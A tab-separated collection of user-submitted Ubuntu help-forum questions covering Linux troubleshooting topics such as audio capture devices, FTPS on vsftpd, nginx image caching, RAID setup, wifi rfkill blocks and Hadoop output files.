484414	unknown micropohne can hear unknown person ( weird )	i tried to capture a video using webcam and vlc . on menu i select `` open capture device '' . vlc then presents my webcam and 4 audio devices named hw:0,0 , hw:0,2 , hw:1,0 and hw:10 . because i do n't know which one is my headset microphone i simply tested them . and now the weird thing : when i choose hw:10 i can hear a unknown person . the person clearly does n't know that he/she is captured by microphone . i can hear him/her typing on a keyboard and have some surrounding sound . sometimes he/she talks with someone in the room . all in a language that i do n't know . where can this come from ? the only speculation i have is , it has something to do with skype . ( because i work with many freelancers from other countries ) . and now the actual question : how can i find out , what microphone this is and where it comes from ? ( and how can i make sure nobody else can here me ! ? ) edit : after firs answer , her is the result of arecord -l : arecord -l **** liste der hardware-geräte ( capture ) **** karte 0 : mid [ hda intel mid ] , gerät 0 : alc889 analog [ alc889 analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 0 : mid [ hda intel mid ] , gerät 2 : alc889 alt analog [ alc889 alt analog ] sub-geräte : 2/2 sub-gerät # 0 : subdevice # 0 sub-gerät # 1 : subdevice # 1 karte 1 : u0x46d0x825 [ usb device 0x46d:0x825 ] , gerät 0 : usb audio [ usb audio ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 3 : headset [ logitech usb headset ] , gerät 0 : usb audio [ usb audio ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0
484417	screen brightness limited when using keyboard	when i use my laptop 's keys to change brightness , i can only go to a certain max . see image : if i use the brightness setting ( standard brightness & lock app ) , i can put it to max brightness without issue , but as soon as i use the keys again , it drops to the max brightness as in the image . ie . it is only is limited when using the keyboard buttons . this worked correctly from 11.04 until 13.10 . the issue started with 14.04 . i 'm using a lenovo thinkpad edge e420 . thanks for your help , shiraz
484421	haskell platform on 14.04	is it right that 14.04 does not have the haskell platform avaible by the software center . do i need to compile it by source or is there anothe way to make this work ? roelof
484422	ca n't connect to ftps on port 990	i am very much new to linux platform . as i wanted to setup a ftp server using ubuntu , i installed it and configured the ftp in it . everything was fine before i enable ssl in vsftpd config file . apart from default settings , i added the following lines to enable ftp ssl in ubuntu server . ssl_enable=yes allow_anon_ssl=no force_local_data_ssl=yes force_local_logins_ssl=yes ssl_tlsv1=yes ssl_sslv2=yes ssl_sslv3=yes # filezilla uses port 21 if you do n't set any port # in servertype `` ftpes - ftp over explicit tls/ssl '' # port 990 is the default used for ftps protocol . # uncomment it if you want/have to use port 990. listen_port=990 pasv_min_port=12000 pasv_max_port=12100 now if i try to access it with ftps ( ftps : // i an getting the below error after entering ftp user name . no connection could be made because the target machine actively refused it . connection failed . i noticed that it is trying to establish the connection using port 990 . i just tried to open port 990 by adding rule in iptables . the command i used is sudo iptables -a input -p tcp -- sport 990 -j accept but no success . i request somebody 's help to troubleshoot why the connection is not establishing and how i can open necessary ports in ubuntu .
484425	deskcon-server and deskcon-indicator errors	i 've installed both software on my ubuntu 14.04 , using the instructions here : http : //screenfreeze.net/deskcon-ppa/ everything worked , but after a restart i see deskcon-indicator in the taskbar , but it does n't work . it seems deskcon-server was not loaded , so i killed deskcon-indicator and started deskcon-server from terminal : $ sudo deskcon-server then i launched deskcon-indicator : $ deskcon-indicator $ error : dbus.proxies : introspect error on net.screenfreeze.desktopconnector : /net/screenfreeze/desktopconnector : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.serviceunknown : the name net.screenfreeze.desktopconnector was not provided by any .service files traceback ( most recent call last ) : file `` ./deskcon-indicator '' , line 87 , in setupdevice self.dbusclient.setup_device ( ) file `` ./deskcon-indicator '' , line 232 , in setup_device self.iface.setup_device ( ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout )
484427	install ubuntu on thinkpad t440p	is there anybody , who is able to install and fully configure ubuntu 12.04 or 14.04 on thinkpad t440p ( ver 20an ) ? if yes , could you post here your procedure step by step ? please does not include your experience with any other thinkpad models . edit : situation is not so simple , see : lenovo thinkpad t440p + ubuntu 12.04/14.04
484429	unable to update/install : linux-image-3.11.0-22-generic not found	i 'm unable to install a lot of packages using apt-get , or work with ubuntu software updater at all , neither am i able to update to trusty ... doing any of these gives the following error : $ sudo apt-get install -f [ sudo ] password for josh : reading package lists ... done building dependency tree reading state information ... done e : the package linux-image-3.11.0-22-generic needs to be reinstalled , but i ca n't find an archive for it . am using saucy
484432	paper get printed in wrong position	i 've recently upgraded to xubuntu 14.04 from xubuntu 12.04 but this problem presented itself a few months before the upgrade . i have a laserjet 3330 mpf printer copier scanner . for this i use hpcups 3.14.3 drivers on 14.04 and used hpcups 3.12.2 on 12.04 the printer has a centered paper tray . i print address labels on a6 size material and while this used to worked perfectly , the last few months i can only use this driver if i print the a6 label at the top left position of a4 size paper ( 4 sheets of a6 fit in one a4 sheet ) , actually placing the label on the paper to be fed through the printer together . using another driver does not print the image on the label good enough ( very rough ) , or at all ( i stop waiting if it takes more than a few minutes ) . hp cups is nice and quick . in short , the driver neglects the fact that this printer has a centralized feed . i have tried looking in the ppd file for clues and searched the web but found no solution .
484433	restore main menu items in lubuntu	can someone post here /home/your_user/.config/menus/lxde-application.menu file ? i 've got it rewritten and now my menu is broken . or if someone know how to restore main menu applet - feel free to answer thank you
484434	install ubuntu without cd and usb , how ?	i want to install ubuntu on my laptop , that does n't have a cd-rom drive , and i have no spare usb disk spare . i 've tried wubi , but that does n't seem to work ( since it prompts me to have the cd in the drive , wich i dont have . ) how can i install ubuntu , easily and in a fast way ? p.s : i want it to dual boot it with windows 7 ( which was preinstalled ) . edit : when extracting the iso to a folder , and run wubi , it does install , but when i reboot the computer , it does n't show grub , nor i can choose if i want to boot ubuntu or windows 7 . after trying for the third time today , wubi gives me an error : an error occurred : permission denied . i 'm the administrator on the pc . how come ?
484437	error while attempting to install apache 2 version 2.2 on ubuntu 14.04	i am attempting to install apache2 version 2.2 on a computer i just upgraded from ubuntu 12.04 lts to 14.04 lts because a critical software package that runs perfectly on the version of apache in 12.04 does not work on version 14.04 . from other questions in this forum , i see there is a way to specify a version number while using apt-get , but this is n't working . here 's what i get : christopher @ tricia : ~ $ sudo apt-get install apache2=2.2 reading package lists ... done building dependency tree reading state information ... done e : version '2.2 ' for 'apache2 ' was not found christopher @ tricia : ~ $ does anyone know the correct syntax to do this ? thank you !
484444	emacs and xft fonts	i 'm trying to set up consolas font in emacs . i built emacs with -- configure -- with-xft and put : emacs.font : consolas-16 emacs.fontbackend : xf to the .xsession but when i 'm trying to start emacs i 'm getting this error : font `consolas-16 ' is not defined how can i fix it ? thank you . upd . problem fixed . sudo apt-get install build-essential texinfo libx11-dev libxpm-dev libjpeg-dev libpng-dev libgif-dev libtiff-dev libgtk2.0-dev libncurses-dev ./configure -- with-dbus -- with-toolkit-scroll-bars -- with-xft -- with-xpm -- with-jpeg -- with-tiff -- with-gif -- with-libotf -- with-xim -- with-gconf -- with-gnutls
484449	can i install microsoft visual studio onubuntu ?	i want to use opencv for that i need visual studio on my ubuntu machine . is it possible to implement canny edge detection algorithm using opencv on arm9 ? is their any way to sort out my problem . please help
484451	ubuntu 12.04 wifi not working	my wifi is not working since i uninstalled network-manager-gnome . the output of sudo lshow -c network is *-network disabled description : wireless interface product : pro/wireless 5100 agn [ shiloh ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:21:5d:9c : b9 : c6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-22-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:47 memory:98700000-98701fff *-network description : ethernet interface product : 88e8042 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:85:00.0 logical name : eth0 version : 00 serial : 00:22:64:57:9a:33 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory:98600000-98603fff ioport:2000 ( size=256 ) how do i enable my wifi on the terminal since i do n't have the network manager gui . doing ifconfig wlan0 up returned this error siocsifflags : operation not permitted and when i used sudo i got siocsifflags : operation not possible due to rf-kill doing lsmod returned module size used by nls_iso8859_1 12617 0 usb_storage 48631 0 pci_stub 12550 1 vboxpci 22910 0 vboxnetadp 13328 0 vboxnetflt 27240 0 vboxdrv 252210 3 vboxpci , vboxnetadp , vboxnetflt bnep 19210 2 rfcomm 59026 12 snd_hda_codec_analog 75690 1 parport_pc 32114 0 ppdev 17423 0 arc4 12509 2 iwldvm 226487 0 binfmt_misc 17268 1 mac80211 534971 1 iwldvm uvcvideo 72275 0 snd_hda_intel 43326 2 videobuf2_core 39385 1 uvcvideo snd_hda_codec 169608 2 snd_hda_codec_analog , snd_hda_intel videodev 107944 2 uvcvideo , videobuf2_core snd_hwdep 13276 1 snd_hda_codec snd_pcm 94597 2 snd_hda_intel , snd_hda_codec videobuf2_vmalloc 13048 1 uvcvideo snd_seq_midi 13132 0 snd_rawmidi 25157 1 snd_seq_midi btusb 23534 0 i915 615880 3 snd_seq_midi_event 14475 1 snd_seq_midi videobuf2_memops 13170 1 videobuf2_vmalloc bluetooth 341971 24 bnep , rfcomm , btusb iwlwifi 153182 1 iwldvm snd_seq 55716 2 snd_seq_midi , snd_seq_midi_event snd_timer 28930 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq drm_kms_helper 47306 1 i915 drm 247722 4 i915 , drm_kms_helper psmouse 92826 0 snd 61270 14 snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_seq_midi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd snd_page_alloc 18398 2 snd_hda_intel , snd_pcm cfg80211 416271 3 iwldvm , mac80211 , iwlwifi joydev 17329 0 i2c_algo_bit 13316 1 i915 serio_raw 13189 0 hp_wmi 17834 0 lpc_ich 16987 0 hp_accel 25756 0 sparse_keymap 13658 1 hp_wmi video 19046 1 i915 lis3lv02d 19600 1 hp_accel wmi 18744 1 hp_wmi mac_hid 13077 0 input_polldev 13648 1 lis3lv02d lp 13359 0 parport 40930 3 parport_pc , ppdev , lp ahci 25703 2 sky2 53656 0 libahci 30834 1 ahci doing sudo rfkill list all returned 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hp-gps : gps soft blocked : yes hard blocked : yes 4 : phy0 : wireless lan soft blocked : yes hard blocked : yes 5 : hci0 : bluetooth soft blocked : no hard blocked : no running lspci -nn | grep -i net returned 02:00.0 network controller [ 0280 ] : intel corporation pro/wireless 5100 agn [ shiloh ] network connection [ 8086:4237 ] 85:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8042 pci-e fast ethernet controller [ 11ab:4357 ] i do not understand why am getting this error and i have not uninstalled my wifi drivers which were working well before
484453	ca n't configure nginx to cache the images	i have been trying to cache images that are stored in nginx server , i am quite new here and to nginx i have installed it and configure it with php5-fpm , i have been reading many tutorial regarding caching images and php files . i have succeeded in caching the php files but i ca n't cache the images here is part of the nginx config file : fastcgi_cache_path /etc/nginx/cache levels=1:2 keys_zone=myapp:100m inactive=60m ; fastcgi_cache_key `` $ scheme $ request_method $ host $ request_uri '' ; fastcgi_cache_use_stale error timeout invalid_header http_500 ; add_header x-cache $ upstream_cache_status ; server { listen 80 default_server ; listen [ : : ] :80 default_server ipv6only=on ; root /usr/share/nginx/html ; index index.html index.htm ; # make site accessible from http : //localhost/ server_name localhost ; set $ skip_cache 0 ; # post requests and urls with a query string should always go to php if ( $ request_method = post ) { set $ skip_cache 1 ; } if ( $ query_string ! = `` '' ) { set $ skip_cache 1 ; } location / { try_files $ uri $ uri/ /index.php ? $ args ; } location ~ \.php $ { fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_index index.php ; include fastcgi_params ; fastcgi_cache myapp ; fastcgi_cache_valid 200 60m ; } location ~* ^.+\ . ( jpg|jpeg|gif|png ) $ { access_log off ; log_not_found off ; expires 1d ; } location ~ /\ . { deny all ; access_log off ; log_not_found off ; } } now when i run curl -i http : //xxx.xxx.xxx.xxx/script.php i can see the md5 of the script created in /etc/nginx/cache folder and i can see the x-cache : hit however , when i run curl -i http : //xxx.xxx.xxx.xxx/image.jpg no file created in the /etc/nginx/cache and i have the following result in the console : http/1.1 200 ok server : nginx/1.4.6 ( ubuntu ) date : tue , 17 jun 2014 08:14:37 gmt content-type : image/jpeg content-length : 55936 last-modified : tue , 17 jun 2014 04:30:11 gmt connection : keep-alive etag : `` 539fc453-da80 '' expires : wed , 18 jun 2014 08:14:37 gmt cache-control : max-age=86400 accept-ranges : bytes now it looks fine however when i run it again the expiry date will keep changing as if it is calling new image not the cache http/1.1 200 ok server : nginx/1.4.6 ( ubuntu ) date : tue , 17 jun 2014 08:16:34 gmt content-type : image/jpeg content-length : 55936 last-modified : tue , 17 jun 2014 04:30:11 gmt connection : keep-alive etag : `` 539fc453-da80 '' expires : wed , 18 jun 2014 08:16:34 gmt cache-control : max-age=86400 accept-ranges : bytes my questions are : 1- should the cached images be shown in the cache folder ? 2- does fastcgi capable of caching the images ? 3- what can i do to fix the image caching problem ? sorry for the beginner questions , but i ca n't find the answer .
484454	how to disable gtk+ 3.12 client side decorations ?	i 've updated my ubuntu 14.04 with gnome/gtk 3.12 ( because i want to test drive gnome and play with some recent gnome applications ) , but as a result , all gnome application now use client side decorations also when running under my default kde workspace . is there a way to disable the gtk+ 3.12 default use of csd outside gnome shell ?
484455	sendmail with cron job	a= $ ( df -h /mnt/smb | tail -n +3 | tr -s ' ' | tr ' % ' ' ' | cut -d ' ' -f 5 ) echo $ a if [ [ $ a -ge 30 ] ] ; then cat /etc/diskspace/text.txt | sendmail test.gmail.com fi hallo guys this is my script and everyhing is working so well acording to my need . i just have one question . i want to run this script via cronjob . like every minutes . ( * * * * * ( . /etc/diskspacae/vpndrive.sh ) # -- cron job command . as you can see that i want to perform sendmail command that afte running this script if drive space is more than 80 % , i get notification in my email . but i dont get it when i run this script for cron tab . and get this error msg in /var/spool/mail/root . error messae : /etc/diskspace/vpndrive.sh line 34 : sendmail : command not found . any guess please ?
484458	unable to type dollar symbol after installing gnome 3.10 on ubuntu 14.04	i recently installed the gnome 3.10 which is compatible with ubuntu 14.04 . i am not sure if that is what caused this , but i am unable to type the dollar symbol ( shift + 4 ) anywhere . i have used multiple keyboards and the problem persists . so it 's not a hardware issue . i have only ubuntu installed , so i can not check it by logging into a different os . any ideas on what i can try ?
484459	disable all usb storage devices and enable some devices based on vendorid	i tried by adding below udev rule action== '' add '' , subsystems== '' usb '' , run+= '' /bin/sh -c 'for host in /sys/bus/usb/devices/usb* ; do echo 0 > $ host/authorized_default ; done ' '' action== '' add '' , attr { idvendor } == '' 054c '' run+= '' /bin/sh -c 'echo 1 > /sys $ devpath/authorized ' '' but it disabled all usb devices ( usb keyboard and mouse ) . kindly suggest how can i allow other devices except storage devices .
484463	installing ubuntu in a windows laptop in dual boot mode-please help	i have a hp pavillion laptop with windows 8.1 sl installed .i want to install ubuntu in my laptop with dual boot . i have downloaded the latest ubuntu iso . please help in getting the step to install ubuntu in windows 8.1 as dual boot . the configurations are processor : intel core i3 3rd gen hdd : 500gb- ( partitions-c , d , e , f ; c drive contains windows , d and e are free and f is the rocovery drive . ) ram:4 gb graphics:2gb
484469	eclipse crashes in splash screen	my eclipse is crashing when i start it . it has been running fine for month and since yesterday it stops loading . this is what happens when i start eclipse with the -debug flag : -jar /opt/eclipse_modelingtools_4.3//plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar install location : file : /opt/eclipse_modelingtools_4.3/ configuration file : file : /opt/eclipse_modelingtools_4.3/configuration/config.ini loaded configuration location : file : /opt/eclipse_modelingtools_4.3/configuration/ framework located : file : /opt/eclipse_modelingtools_4.3/plugins/org.eclipse.osgi_3.9.1.v20140110-1610.jar loading extension : reference : file : org.eclipse.equinox.weaving.hook_1.0.200.i20130319-1000.jar eclipse.properties not found framework classpath : file : /opt/eclipse_modelingtools_4.3/plugins/org.eclipse.osgi_3.9.1.v20140110-1610.jar file : /opt/eclipse_modelingtools_4.3/plugins/ file : /opt/eclipse_modelingtools_4.3/plugins/org.eclipse.equinox.weaving.hook_1.0.200.i20130319-1000.jar splash location : /opt/eclipse_modelingtools_4.3//plugins/org.eclipse.platform_4.3.2.v20140221-1700/splash.bmp debug options : file : /opt/eclipse_modelingtools_4.3/.options not found time to load bundles : 6 starting application : 3940 in the moment when the message starting application : 3940 appears in the console , the splash screen turns grey and then nothing more happens . the dialog that prompts me for the workspace directory never appears . i have already updated or changed my java version ( using the update-alternatives commmand ) . i tried openjdk and oracle java 1.7.21 and 1.7.60 . i have tried to start a all of the different eclipse versions that i have installed , and even a freshly downloaded eclipse . they all have the same behavior . it seems something on my computer is blocking eclipse to start but i can not figure out what . is there any way to get more debug output then what i already posted ?
484470	14.04 live usb with more than 4gb of persistent data	... before mark this as duplicated : i already tried to perform what is suggested by this and other sites , but without success : create a usb live with startup disk creator / unetbootin make a ext2/ext4 partition on the same device with label casper-rw some suggest to remove the casper-rw file from the usb drive fat32 partition , too . ... the live version will automatically use the casper-rw partition and you will see with df -h that you have 20 gb ( for instance ) of free space on / i want to create a usb live device with ubuntu 14.04 , then i will perform the ( many ) customization i need ( packages installation , repository changing , many other software installations ) and then using it to install on several pcs in my office . the problem is that i need more than 4gb of data to do this . i actually have ubuntu 12.04 , so i did the steps suggested above with 12.04 version of startup disk creator ( or with the last unetbootin version ) but what i obtain is a partition called casper-rw which is mounted at boot as /media/casper-rw ( or something similar ) , and not as / . all the suggestion i 've found in internet by now are older than 14.04 . somebody has suggestions ?
484471	what is abecho command line in teamviewer package	i convert a debian package to tgz package using alien -t . then , i browse this new package to inspect some scripts : one of script includes this code : abecho `` teamviewer '' `` run teamviewer directly '' echo `` you can just extract the tar.gz package and run 'teamviewer ' without installation . '' echo is clear : it is used to display messages on console . however , what is abecho ? known that i looked for an executable file with this name in package and i do n't found it . i guess : it seems that it 's such as echo . however , it supports more than one argument , each argument is a message that will be printed alone ( for each line , one message=argument )
484475	external display on hp 2013 ultraslim-docking station with ubuntu	i have an elitebook 840 g1 with dual ati + amd graphics and hp 2013 ultraslim-docking station . i want to plug external monitor to the one of displayports located on the dock . the external monitor works if i 'm running windows , but i ca n't enable it on the linux . from the other side hp 's elitebook build-in display port works on both os . hp advertise the linux support on the product page . i 'm wondering if the display port on the dock are supported . thank you for your advice .
484477	where do `` report issues '' go ?	i seem to have these messages pop up that says : ubuntu has experienced an issue do you want to report it ? this seems to occur a lot especially after the system freezes up for ten minutes or longer , so where do these issues get reported and how are they resolved ? and ( assuming they do n't get sucked into a black hole ) can i track the progress on my reported issues ?
484481	xmonad key-binding on release	i am trying to implement a keyboard layout switcher for xmonad as per how do i change my keyboard layout while using xmonad ? . i want to use alt+lshift since it is what i have used in years : main = do xmonad $ defaultconfig { terminal = `` gnome-terminal '' } `additionalkeys` [ ( ( mod1mask , xk_shift_l ) , spawn `` /home/gauthier/bin/layout_switch.sh '' ) ] my problem is that applications do not respond to shortcuts that contain alt+lshift anymore . for example in emacs , i usually type m- < this way : lalt+lshift+.. with the layout switcher setup above , xmonad takes the key chord , and emacs gets nothing . how can i keep the shortcut for keyboard switcher , and still have other applications take such shortcuts ? i am ok with the keyboard switcher actually changing layout on release of alt+lshift .
484482	problem with silverlight	i have just setup ubuntu 14.04 and i keep getting the popup to install this : '' failure to download extra data files the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . wine-silverlight4-installer , wine-browser-installer , ttf-mscorefonts-installer '' i installed it from the command line and it worked but still i keep getting the popup and firefox does not open until this gets fixed .
484495	stuck setting up raid 1	i 've tried switching to linux many times before and each time came up to a problem and ended up giving up . this time i hope things are different . i have a home server : p8z77 , 1xssd ( with ubuntu 14.04 desktop currently installed ) , 2x1tb wd red hdd 's , processor is an i5 from a couple of years back . i have just installed ubuntu so there 's pretty much nothing but the basics on there . my goal has been to set up the 2 1tb drives in raid 1 and use that as a backup/web server/email server/home cloud etc . to set up the raid 1 i have followed the following guide : http : //www.mysolutions.it/tutorial-mdadm-software-raid-ubuntu-debian-systems/ # prepare-hard-drives i 'm stuck on point 2 - assembly . when i type in the command sudo mdadm -- assemble -- scan i get the output : mdadm : no arrays found in config file or automatically . then i do : cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sdc [ 1 ] sdb [ 0 ] 976762496 blocks [ 2/2 ] [ uu ] unused devices : then : sudo mdadm -- assemble /dev/md0 /dev/sdb /dev/sdc , the result is : mdadm : /dev/sdb is busy - skipping mdadm : /dev/sdc is busy - skipping any help would be greatly appreciated !
484496	how can i assign aliases and remove them in gnome do ?	i 'm interested in using gnome do 's alias feature . i ca n't find any information about how to use it , though . how can i assign aliases and how can i remove them in gnome do ?
484497	way to play only songs that were last played before a certain date in amarok	i want to make a dynamic playlist in amarok ( version 2.8.0-0ubuntu3 ) which plays songs that i have n't heard in a while , for example should it contain only songs that were last played in 2013 or earlier . this being a fairly straightforward condition i thought there was an easy way to do this , but i have n't found a way and googling the question did n't help much . what i have tried : i looked for a search keyword that i could use for this . this amarok manual says somewhat diffusely that it is possible to search for last modified , but does n't say how to do that . i tried to sort the playlist by last played , hoping that that would trick amarok into playing only songs before a certain date if seeded correctly , but unfortunately the last played date of the current song is changed to `` just now '' just before it ends , sorting it to the top . the next song then played is the one played next to last , so amarok just gets into a loop of the last two songs . i then changed the number of previous songs in the playlist to 0 , hoping that that would automatically delete all songs that were played after the last time the current song was played . this would have of course led to a running off to the `` never played '' songs , but slowly enough for me to live with that . but it does n't work , because amarok does n't delete the songs above the current song . my current workaround is to fill the playlist with as many songs as possible , sort this by last played , then put all the songs i want into the waiting loop ( or whatever this is called in the english version , i mean the option you can select by rightclicking on a song in the playlist ) , delete the rest , and repeat this process approximately every 7 hours . now i 'm hoping there 's is a less annoying way to achieve this , so : is there a good way to do this ?
484498	refresh indicator-cpufreq	is there a way to refresh indicator-cpufreq / cpu frequencies after enabling a pstate on the cpu ( without reboot ) ? thank you .
484500	forgot password for another one user account created in my system , how to solve it ?	i have two user accounts and forgot one user 's password . i have tried to reset it from the boot menu . after selecting recovery mode i have selected drop to root shell prompt option but then it asked me to `` give the root password for maintenance ( or type control-d to continue ) '' do n't know the password and even typing control-d does n't work what should i do now ? ? please give me a solution
484501	error : [ cat : file does not exist ] i ca n't open hadoop output file in 14.04	i have installed hadoop-1.0.3 in my system ( 14.04 ) , followed this tutorial . and i successfully run an sample mapreduce program for wordcount as follows , hadoopuser @ arul-pc : /usr/local/hadoop $ bin/hadoop jar hadoop*examples*.jar wordcount /user/hadoopuser/sampledata /user/hadoopuser/sampleoutput 14/06/17 15:25:45 info input.fileinputformat : total input paths to process : 3 14/06/17 15:25:45 info util.nativecodeloader : loaded the native-hadoop library 14/06/17 15:25:45 warn snappy.loadsnappy : snappy native library not loaded 14/06/17 15:25:45 info mapred.jobclient : running job : job_201406171444_0002 14/06/17 15:25:46 info mapred.jobclient : map 0 % reduce 0 % 14/06/17 15:26:04 info mapred.jobclient : map 66 % reduce 0 % 14/06/17 15:26:13 info mapred.jobclient : map 100 % reduce 0 % 14/06/17 15:26:16 info mapred.jobclient : map 100 % reduce 22 % 14/06/17 15:26:28 info mapred.jobclient : map 100 % reduce 100 % 14/06/17 15:26:33 info mapred.jobclient : job complete : job_201406171444_0002 14/06/17 15:26:33 info mapred.jobclient : counters : 29 14/06/17 15:26:33 info mapred.jobclient : job counters 14/06/17 15:26:33 info mapred.jobclient : launched reduce tasks=1 14/06/17 15:26:33 info mapred.jobclient : slots_millis_maps=33037 14/06/17 15:26:33 info mapred.jobclient : total time spent by all reduces waiting after reserving slots ( ms ) =0 14/06/17 15:26:33 info mapred.jobclient : total time spent by all maps waiting after reserving slots ( ms ) =0 14/06/17 15:26:33 info mapred.jobclient : launched map tasks=3 14/06/17 15:26:33 info mapred.jobclient : data-local map tasks=3 14/06/17 15:26:33 info mapred.jobclient : slots_millis_reduces=21208 14/06/17 15:26:33 info mapred.jobclient : file output format counters 14/06/17 15:26:33 info mapred.jobclient : bytes written=880838 14/06/17 15:26:33 info mapred.jobclient : filesystemcounters 14/06/17 15:26:33 info mapred.jobclient : file_bytes_read=2214875 14/06/17 15:26:33 info mapred.jobclient : hdfs_bytes_read=3671899 14/06/17 15:26:33 info mapred.jobclient : file_bytes_written=3775759 14/06/17 15:26:33 info mapred.jobclient : hdfs_bytes_written=880838 14/06/17 15:26:33 info mapred.jobclient : file input format counters 14/06/17 15:26:33 info mapred.jobclient : bytes read=3671523 14/06/17 15:26:33 info mapred.jobclient : map-reduce framework 14/06/17 15:26:33 info mapred.jobclient : map output materialized bytes=1474367 14/06/17 15:26:33 info mapred.jobclient : map input records=77931 14/06/17 15:26:33 info mapred.jobclient : reduce shuffle bytes=1207341 14/06/17 15:26:33 info mapred.jobclient : spilled records=255966 14/06/17 15:26:33 info mapred.jobclient : map output bytes=6076101 14/06/17 15:26:33 info mapred.jobclient : total committed heap usage ( bytes ) =517210112 14/06/17 15:26:33 info mapred.jobclient : cpu time spent ( ms ) =11530 14/06/17 15:26:33 info mapred.jobclient : combine input records=629172 14/06/17 15:26:33 info mapred.jobclient : split_raw_bytes=376 14/06/17 15:26:33 info mapred.jobclient : reduce input records=102324 14/06/17 15:26:33 info mapred.jobclient : reduce input groups=82335 14/06/17 15:26:33 info mapred.jobclient : combine output records=102324 14/06/17 15:26:33 info mapred.jobclient : physical memory ( bytes ) snapshot=589725696 14/06/17 15:26:33 info mapred.jobclient : reduce output records=82335 14/06/17 15:26:33 info mapred.jobclient : virtual memory ( bytes ) snapshot=1862012928 14/06/17 15:26:33 info mapred.jobclient : map output records=629172 when i check the output file it is present in output folder , hadoopuser @ arul-pc : /usr/local/hadoop $ bin/hadoop dfs -ls /user/hadoopuser/sampleoutput found 3 items -rw-r -- r -- 1 hadoopuser supergroup 0 2014-06-17 15:26 /user/hadoopuser/sampleoutput/_success drwxr-xr-x - hadoopuser supergroup 0 2014-06-17 15:25 /user/hadoopuser/sampleoutput/_logs -rw-r -- r -- 1 hadoopuser supergroup 880838 2014-06-17 15:26 /user/hadoopuser/sampleoutput/part-r-00000 i tried to open it using following command , hadoopuser @ avvenire-pc : /usr/local/hadoop $ bin/hadoop dfs -cat /user/hadoopuser/sampleoutput/part-r-0000 but i am getting result as follows , cat : file does not exist : /user/hadoopuser/sampleoutput/part-r-0000 please provide me a solution . thank in advance .
484503	using the dd command to copy 'broken ' disk	i have got an external seagate harddisk , used for backup . now i ca n't enter the disk ( not used dd command yet ! ) . when i plugged it to a windows computer , it said the disk needed to be formatted before it could be accessed , a linux running ubuntu 12.04 ca n't mount it , though i can find it if i use hwinfo -- disk in the terminal . a friend told me about the dd command in linux , and i know it 's risky ( if you put input as output and output as input data is lost ) . i tried `` dd if=/dev/sdc of=/dev/sdb '' and got `` access denied '' , so i guess nothing has been overwritten at least . sdc is the seagate disk according to hwinfo and diskhandling manager installed at ubuntu , and sdb is an internal disk with same capacity , just empty . any ideas of what i should do to restore my data ( if dd is able to ) ? or is the disk just too damaged to recover ?
484504	filter only path of files ( without directories path ) from output using pipe |	rpm -qpl dhad-9.0.27891-2.x86_64.rpm allows to display all file paths and directory paths of this package . example of output : /opt/dhad/tv_bin/wine/lib/wine/winmm.dll.so /opt/dhad/tv_bin/wine/lib/wine/winspool.drv.so /opt/dhad/tv_bin/wine/lib/wine/winsta.dll.so /opt/dhad/tv_bin/wine/lib/wine/wintrust.dll.so /opt/dhad/tv_bin/wine/lib/wine/ws2_32.dll.so /opt/dhad/tv_bin/wine/lib/wine/wtsapi32.dll.so /opt/dhad/tv_bin/wine/share /opt/dhad/tv_bin/wine/share/wine /opt/dhad/tv_bin/wine/share/wine/fonts /opt/dhad/tv_bin/wine/share/wine/fonts/coue1255.fon /opt/dhad/tv_bin/wine/share/wine/fonts/coue1256.fon /opt/dhad/tv_bin/wine/share/wine/fonts/coue1257.fon /opt/dhad/tv_bin/wine/share/wine/fonts/coure.fon /opt/dhad/tv_bin/wine/share/wine/fonts/couree.fon /opt/dhad/tv_bin/wine/share/wine/fonts/coureg.fon /opt/dhad/tv_bin/wine/share/wine/fonts/courer.fon /opt/dhad/tv_bin/wine/share/wine/fonts/couret.fon /opt/dhad/tv_bin/wine/share/wine/fonts/cvgasys.fon /opt/dhad/tv_bin/wine/share/wine/fonts/hvgasys.fon /opt/dhad/tv_bin/wine/share/wine/fonts/jsmalle.fon /opt/dhad/tv_bin/wine/share/wine/fonts/jvgasys.fon /opt/dhad/tv_bin/wine/share/wine/fonts/marlett.ttf /opt/dhad/tv_bin/wine/share/wine/fonts/smae1255.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smae1256.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smae1257.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smalle.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smallee.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smalleg.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smaller.fon /opt/dhad/tv_bin/wine/share/wine/fonts/smallet.fon 